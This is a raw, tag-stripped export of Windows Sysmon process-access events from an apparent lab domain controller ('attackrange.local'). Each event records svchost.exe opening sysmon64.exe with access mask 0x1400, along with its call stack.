10:40:10.419{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001614Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.419{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001613Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.419{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001612Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.419{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001611Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.419{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001610Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.419{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001609Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.419{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001608Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.419{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001607Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.419{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001606Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.411{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001605Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.410{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001604Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.410{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001603Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.410{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001602Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.410{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001601Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.410{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001600Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.410{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001599Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.410{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001598Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.410{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001597Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.406{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001596Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.406{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001595Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.406{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001594Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.406{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001593Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.406{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001592Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.406{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001591Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 